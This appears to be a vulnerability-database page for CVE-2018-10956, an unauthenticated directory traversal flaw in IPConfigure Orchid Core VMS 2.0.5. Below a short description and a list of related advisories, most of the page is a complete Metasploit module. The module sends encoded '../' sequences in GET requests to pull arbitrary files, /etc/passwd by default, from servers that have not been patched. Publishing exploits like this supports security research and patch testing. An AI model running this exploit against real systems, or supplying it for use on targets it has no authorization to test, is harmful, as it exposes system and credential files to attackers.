Unauthenticated Privileged Directory Traversal in IPConfigure Orchid Core VMS(CVE-2018-10956)

🗓️ 21 Jun 2018 00:00:00Reported by My SeebugType

Unauthenticated Privileged Directory Traversal in IPConfigure Orchid Core VMS (CVE-2018-10956) allows remote attackers to read arbitrary files outside the web directory, impacting both Windows and Linux

Reporter	Title	Published	Views	Family All 12
0day.today	IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure Exploit	21 Jun 201800:00	–	zdt
Check Point Advisories	IPConfigure Orchid Core VMS Directory Traversal (CVE-2018-10956)	31 May 202000:00	–	checkpoint_advisories
CVE	CVE-2018-10956	25 Jun 201815:00	–	cve
Cvelist	CVE-2018-10956	25 Jun 201815:00	–	cvelist
Exploit DB	IPConfigure Orchid VMS 2.0.5 - Directory Traversal / Information Disclosure (Metasploit)	20 Jun 201800:00	–	exploitdb
exploitpack	IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)	20 Jun 201800:00	–	exploitpack
Nuclei	IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion	2 Jun 202610:14	–	nuclei
NVD	CVE-2018-10956	25 Jun 201815:29	–	nvd
OpenVAS	Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check	18 Apr 201700:00	–	openvas
OSV	CVE-2018-10956	25 Jun 201815:29	–	osv


                                                require 'msf/core'

class MetasploitModule < Msf::Auxiliary
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IPConfigure Orchid VMS <=2.0.5 Directory Traversal Information Disclosure',
			'Description'    => %q{
				Orchid Core VMS is vulnerable to a directory traversal attack. This affects Linux and Windows operating systems. This allows a remote, unauthenticated attacker to send crafted GET requests to the application, which results in the ability to read arbitrary files outside of the applications web directory. This issue is further compounded as the Linux version of Orchid Core VMS application is running in context of a user in the sudoers group. As such, any file on the underlying system, for which the location is known, can be read. 

				This module was tested against 2.0.5. This has been fixed in 2.0.6.
			},
			'Author'         => [ 'Sanjiv Kawa @kawabungah' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2018-10956' ],
					[ 'URL', 'https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/' ],
					[ 'URL', 'http://ipconfigure.com/products/orchid-archives' ]
				],
			'DisclosureDate' => 'May 7, 2018'))

		register_options(
			[
				OptString.new('TARGETURI', [true, 'The base path to Orchid VMS', '/']),
				OptString.new('FILE', [ true, 'This is the file to download', '/etc/passwd']),
				OptString.new('INPUTFILE', [ false, 'Specify a list of files to download']),
				Opt::RPORT(80)
			], self.class )
	end

	def init_request(path)
		res = send_request_cgi({
			'method'   => 'GET',
			'uri'      => path
			})

		return res
	end

	def run
		path = normalize_uri(target_uri.path)
		res = init_request(path)
	
		if res && res.code == 200
			file = Array.new
			trigger = "%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F" 


			if datastore['INPUTFILE'].nil? || datastore['INPUTFILE'].empty?
     			file = [datastore['FILE']]
    		else
      			file = File.open([datastore['INPUTFILE']].join(', ').to_s).readlines
    		end

    		for i in 0 .. file.length - 1
	    		path = normalize_uri(target_uri.path) + trigger + file[i]
	    		res = init_request(path)
	    		
	    		if res.code == 200 
	    			print_good("Obtained #{datastore['FILE']}")
	    			puts res.body
	    			puts ""
	    		else
	    			print_error("#{datastore['FILE']} does not exist")
	    			puts res.body
	    			puts ""
	    		end
			end
		else
			print_error("Web Server is Unresponsive")
		end
	end
end

21 Jun 2018 00:00Current

7.5High risk

Vulners AI Score7.5

EPSS0.92082